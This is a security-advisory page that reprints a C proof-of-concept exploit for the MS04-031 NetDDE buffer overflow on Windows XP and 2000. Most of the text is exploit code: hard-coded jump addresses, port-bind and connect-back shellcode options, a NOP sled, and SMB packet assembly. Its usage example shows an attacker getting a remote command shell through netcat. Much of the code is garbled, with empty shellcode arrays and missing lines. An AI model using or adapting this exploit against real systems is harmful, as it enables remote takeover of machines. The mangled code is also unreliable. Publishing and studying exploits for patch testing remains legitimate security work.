As we reported in our previous article: Vulnerability in NetDDE Could Allow Remote Code Execution (MS04-031), a vulnerability in NetDDE allows a remote attacker to cause the NetDDE service to execute arbitrary code. The following exploit code can be used to test your system for the mentioned vulnerability.
The information has been provided by houseofdabus HOD.
/* HOD-ms04031-netdde-expl.c: 2004-12-30: PUBLIC v.0.2
* Copyright (c) 2004 houseofdabus.
* (MS04-031) NetDDE buffer overflow vulnerability PoC
* Win32 by Beyond Security's SecuriTeam - A.m.i
* .::[ houseofdabus ]::.
* (special unstable version)
* ---------------------------------------------------------------------
* Description:
* A remote code execution vulnerability exists in the NetDDE
* services because of an unchecked buffer. An attacker who
* successfully exploited this vulnerability could take complete
* control of an affected system. However, the NetDDE services are
* not started by default and would have to be manually started for
* an attacker to attempt to remotely exploit this vulnerability.
* This vulnerability could also be used to attempt to perform
* a local elevation of privilege or remote denial of service.
* ---------------------------------------------------------------------
* Patch: http://www.microsoft.com/technet/security/Bulletin/MS04-031.mspx
* ---------------------------------------------------------------------
* Tested on:
* - Windows XP Professional SP0
* - Windows XP Professional SP1
* - Windows 2000 Professional SP2
* - Windows 2000 Professional SP3
* - Windows 2000 Professional SP4
* - Windows 2000 Advanced Server SP4
* ---------------------------------------------------------------------
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission to
* do so.
* ---------------------------------------------------------------------
* Compile:
* Win32/VC++ : cl -o HOD-ms04031-expl HOD-ms04031-expl.c
* Win32/cygwin: gcc -o HOD-ms04031-expl HOD-ms04031-expl.c -lws2_32.lib
* Linux : gcc -o HOD-ms04031-expl HOD-ms04031-expl.c -Wall
* ---------------------------------------------------------------------
* Command Line Parameters/Arguments:
* HOD-ms04031-expl.exe <host> <netbios name> <target> <bindport>
* [connectback IP] [options]
* Targets:
* 0 [0x00abfafc]: WinXP [universal]
* 1 [0x009efb40]: Win2K [universal]
* Options:
* -f: Netbios name fingerprinting
* ---------------------------------------------------------------------
* Example:
* C:\>HOD-ms04031-expl.exe -f
* [*] Connecting to ... OK
* [*] Fingerprinting... OK
* [+] Remote netbios name: HOD
* C:\>
* C:\>HOD-ms04031-expl.exe HOD 1 7878
* [*] Connecting to ... OK
* [*] Attacking ...OK.
* C:\>nc 7878
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
* C:\WINNT\system32>
* ---------------------------------------------------------------------
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#include <unistd.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#define closesocket(x) close(x)
#define Sleep usleep
/* targets table */
struct targets {
int num;
char name[50];
long jmpaddr;
target[]= {
{ 0, "WinXP [universal] ", 0x00abfb1c - 0x20 },
{ 1, "Win2K [universal] ", 0x009efb60 - 0x20 }
/* portbind shellcode */
unsigned char portbindsc[] =
/* connectback shellcode */
unsigned char connectbacksc[] =
#define SET_PORTBIND_PORT(buf, port) *(unsigned short *)(((buf)+300)) = (port)
#define SET_CONNECTBACK_IP(buf, ip) *(unsigned long *)(((buf)+283)) = (ip)
#define SET_CONNECTBACK_PORT(buf, port) *(unsigned short *)(((buf)+290)) = (port)
eax = target[].jmpaddr -> stack -> jmpcode -> shellcode
1. 0100D605 call dword ptr [eax+20h]
2. jmpcode
3. shellcode
char jmpcode[] =
"\xBB\xBB\xBB\xBB" /* => eax */
char smb_sesreq[] =
char smb_negotiate[] =
char d1[] =
char req1[] =
char req2[] =
char h1[] =
char h2[] =
char h3[] =
unsigned long ndlen = 0;
unsigned long ntarget = 0;
unsigned long backip = 0;
unsigned short bindport = 0;
unsigned long
fixx(unsigned char *data, unsigned long i)
unsigned long len;
len = (data[i+3]<<24) +
(data[i+2]<<16) +
(data[i+1]<<8) +
return len;
unsigned long
chksum(unsigned char *data, unsigned long dlen)
unsigned long i, len;
unsigned long chk;
chk = 0xFFFFFFFF;
len = dlen - 4;
for (i=0; i<len; i+=4)
chk += fixx(data, i);
while (i < dlen) {
chk += (unsigned char)data[i];
return chk;
char *
netbios_encode(char *ndata, char service)
char *tmpdata, *data, *nret;
unsigned long dlen;
char odiv, omod, o;
int i;
data = (char *)calloc(17, 1);
memcpy(data, ndata, strlen(ndata));
dlen = strlen(data);
while (dlen < 15) {
strcat(data, "\x20");
memcpy(data+strlen(data), &service, 1);
nret = (char *)calloc(strlen(data)*2+1, 1);
tmpdata = nret;
for (i=0; i<16; i++) {
o = (char)data[i];
odiv = o / 16;
odiv = odiv + 0x41;
omod = o % 16;
omod = omod + 0x41;
*tmpdata++ = odiv;
*tmpdata++ = omod;
return nret;
unsigned char *
find_smbname(unsigned char *data, unsigned long len)
unsigned char *ptr;
unsigned long i = 0;
ptr = data;
ptr += 91;
while (i <= len - 3) {
if (ptr[i] == '\x00')
if (ptr[i+1] == '\x00')
if (ptr[i+2] == '\x00')
return ptr+i+3;
return NULL;
/* fingerprinting */
unsigned char *
smb_get_name(char *ip)
int sock, r;
unsigned long smbname_len;
unsigned char *name = NULL, *smbname;
struct sockaddr_in s;
struct hostent *he;
unsigned char buf[256];
if ((he = gethostbyname(ip)) == NULL) {
printf("[-] Unable to resolve %s\n", ip);
return NULL;
if (sock < 0) return NULL;
s.sin_family = AF_INET;
s.sin_addr = *((struct in_addr *)he->h_addr);
s.sin_port = htons(139);
memset(&(s.sin_zero), '\0', 8);
memset(buf, 0, 256);
printf("[*] Connecting to %s:139 ... ", ip);
r = connect(sock, (struct sockaddr *) &s, sizeof(struct sockaddr_in));
if (r == 0) {
printf("OK\n[*] Fingerprinting... ");
/* sending session request */
send(sock, smb_sesreq, sizeof(smb_sesreq)-1, 0);
r = recv(sock, (char *)buf, 256, 0);
if (r < 0) goto err;
memset(buf, 0, 256);
/* sending negotiation request */
send(sock, smb_negotiate, sizeof(smb_negotiate)-1, 0);
r = recv(sock, (char *)buf, 256, 0);
if (r < 0) goto err;
smbname = find_smbname(buf, r);
if (smbname == NULL) goto err;
smbname_len = smbname - buf;
name = (unsigned char *)calloc(smbname_len, 1);
/* decoding */
r = 0;
while (smbname_len) {
if (*smbname != '\x00') {
name[r] = *smbname;
} else {
printf("failed\n[-] Can't connect to %s:139\n", ip);
shutdown(sock, 1);
return name;
/* NetDDE packet */
char *
packet_assembly(char *name, char *host)
char *main, *header, *data;
char *lname, *rhost;
unsigned long llen, rlen, len, hlen, dlen, csum, i;
unsigned char name_hi, name_low, rhost_hi, rhost_low;
unsigned char hod_hi, hod_low, len_hi, len_low;
unsigned char nops[] = "\x90\x90\x90\x90"; /* nops */
char hod[] = "HOD-HOD\x01";
char hmain[] = "\x01\x00\xBE\x05\x0A\x00\x00";
char tmp[8];
llen = strlen(name) + 4;
rlen = strlen(host);
lname = (char *)calloc(llen + 3, 1);
rhost = (char *)calloc(rlen + 3, 1);
memcpy(lname, name, llen);
strcpy(rhost, host);
memcpy(lname + llen, "\x01", 1);
strcat(rhost, "\x01");
name_hi = (unsigned char) ((llen+1) / 256);
name_low = (unsigned char) ((llen+1) % 256);
rhost_hi = (unsigned char) ((rlen + llen + 2) / 256);
rhost_low = (unsigned char) ((rlen + llen + 2) % 256);
len = sizeof(hod) - 1;
hod_hi = (unsigned char) (len / 256);
hod_low = (unsigned char) (len % 256);
main = (char *)calloc( sizeof(hod)-1 +
sizeof(hmain)-1 +
llen + rlen +
11, 1 );
memcpy(main, hmain, sizeof(hmain)-1);
sprintf(tmp, "%c%c%c%c%c%c", name_hi, name_low,
rhost_hi, rhost_low, hod_hi, hod_low);
memcpy(main+sizeof(hmain)-1, tmp, 6);
memcpy(main+sizeof(hmain)-1+6, "\x00", 1);
memcpy(main+sizeof(hmain)-1+7, lname, llen+1);
memcpy(main+sizeof(hmain)-1+7+llen+1, rhost, rlen+1);
memcpy(main+sizeof(hmain)-1+7+llen+1+rlen+1, hod, sizeof(hod)-1);
memcpy(main+sizeof(hmain)-1+7+llen+1+rlen+1+sizeof(hod)-1, "\x2e", 1);
len = sizeof(hmain)-1+7+llen+1+rlen+1+sizeof(hod)-1+1;
len_hi = (unsigned char) (len / 256);
len_low = (unsigned char) (len % 256);
/* header */
header = (char *)calloc(sizeof(h1)-1 +
sizeof(h2)-1 +
sizeof(h3)-1 +
9, 1);
memcpy(header, h1, sizeof(h1)-1);
sprintf(tmp, "%c%c", len_hi, len_low);
memcpy(header+sizeof(h1)-1, tmp, 2);
memcpy(header+sizeof(h1)-1+2, h2, sizeof(h2)-1);
memcpy(header+sizeof(h1)-1+2+sizeof(h2)-1, tmp, 2);
memcpy(header+sizeof(h1)-1+2+sizeof(h2)-1+2, h3, sizeof(h3)-1);
csum = chksum(main, len);
+ sizeof(h3)-1, &csum, 4);
/* data */
hlen = sizeof(h1)-1 + sizeof(h2)-1 + sizeof(h3)-1 + 8;
data = (char *)calloc( sizeof(d1)-1 +
len+hlen +
37 +
1200, 1 );
csum = chksum(header, hlen);
memcpy(data+4, &csum, 4);
memcpy(data+4+4, header, hlen);
memcpy(data+4+4+hlen, main, len);
memcpy(data+4+4+hlen+len, d1, sizeof(d1)-1);
/* nops */
for (i=0; i<154; i++)
memcpy(data+4+4+hlen+len+sizeof(d1)-1 + i*4, nops, 4);
/* shellcode */
if (!backip) {
/* portbind */
SET_PORTBIND_PORT(portbindsc, htons(bindport));
memcpy(data+4+4+hlen+len+sizeof(d1)-1+154*4, portbindsc, sizeof(portbindsc)-1);
dlen = 4+hlen+len+sizeof(d1)-1+sizeof(portbindsc)-1+154*4;
} else {
/* connectback */
SET_CONNECTBACK_IP(connectbacksc, backip);
SET_CONNECTBACK_PORT(connectbacksc, htons(bindport));
connectbacksc, sizeof(connectbacksc)-1);
dlen = 4+hlen+len+sizeof(d1)-1+sizeof(connectbacksc)-1+154*4;
ndlen = dlen + 4;
dlen = htonl(dlen);
memcpy(data, &dlen, 4);
return data;
usage(char *prog)
int i;
printf("%s <host> <netbios name> <target> <bindport> [connectback IP] [options]\n\n", prog);
for (i = 0; i < 2; i++)
printf(" %d [0x%.8x]: %s\n", target[i].num, target[i].jmpaddr, target[i].name);
printf("\nOptions:\n\t-f: Netbios name fingerprinting\n");
vargs(int argc, char **argv)
int i, finger = 0;
char *nname = NULL;
for (i = 2; i < argc; i++) {
if (argv[i][0] == '-') {
if (argv[i][1] == 'f')
finger = 1;
if (finger && argc > 2) {
nname = smb_get_name(argv[1]);
if (nname) {
printf("[+] Remote netbios name: %s\n", nname);
} else
if (argc < 5) usage(argv[0]);
if ((ntarget = atoi(argv[3])) > 1) usage(argv[0]);
bindport = (unsigned short)atoi(argv[4]);
if (argc > 5) backip = inet_addr(argv[5]);
main (int argc, char **argv)
int len, sockfd;
char *host;
char *req;
struct hostent *he;
struct sockaddr_in their_addr;
char rbuf[4096];
#ifdef _WIN32
char *ses_req;
char *data, *hname;
char *hn, *hn2;
unsigned long req_sz, hname_len, hn_len;
#ifdef _WIN32
WSAStartup(MAKEWORD(2,0), &wsa);
printf("\n (MS04-031) NetDDE buffer overflow vulnerability PoC\n\n");
printf("\tCopyright (c) 2004-2005 .::[ houseofdabus ]::.\n\n\n");
vargs(argc, argv);
hn = argv[2]; /* target netbios name */
host = argv[1]; /* target host name */
if (strlen(host) > 1024) return 0;
/* target jmpaddr */
memcpy(jmpcode+80, &target[ntarget].jmpaddr, 4);
ses_req = (char *)calloc(sizeof(req1)-1 +
sizeof(req2)-1 +
114, 1);
memcpy(ses_req, req1, sizeof(req1)-1);
memcpy(ses_req+sizeof(req1)-1, "\x20", 1);
hname = netbios_encode(hn, 0x1F);
hname_len = strlen(hname);
memcpy(ses_req+sizeof(req1)-1+1, hname, hname_len);
memcpy(ses_req+sizeof(req1)-1+1+hname_len, "\x00\x20", 2);
memcpy(ses_req+sizeof(req1)-1+1+hname_len+2, req2, sizeof(req2)-1);
memcpy(ses_req+sizeof(req1)-1+1+hname_len+2+sizeof(req2)-1, "\x00", 1);
req_sz = sizeof(req1)-1+sizeof(req2)-1+hname_len+4;
if ((he = gethostbyname(host)) == NULL) {
printf("[-] Unable to resolve %s\n", host);
return 0;
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] Error: socket failed\n");
return 0;
req = req1;
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(139);
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);
/* connecting */
printf("[*] Connecting to %s:139 ... ", host);
if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) < 0) {
printf("[-] Error: connect failed\n");
return 0;
if (send(sockfd, ses_req, req_sz, 0) < 0) {
printf("[-] Error: send failed\n");
return 0;
len = recv(sockfd, rbuf, 4096, 0);
if (len < 0) return 0;
/* check NetDDE */
if ((unsigned char)rbuf[0] != 0x82) {
printf("[-] NetDDE disabled or wrong netbios name\n");
return 0;
hn2 = (char *)calloc(16, 1);
memcpy(hn2, hn, strlen(hn));
hn_len = strlen(hn);
while (hn_len < 15) {
strcat(hn2, "\x20");
/* attacking */
printf("[*] Attacking %s ...", host);
data = packet_assembly(jmpcode, hn2);
if (send(sockfd, data, ndlen, 0) < 0) {
printf("\n[-] Error: send failed\n");
return 0;
len = recv(sockfd, rbuf, 4096, 0);
shutdown(sockfd, 1);
return 0;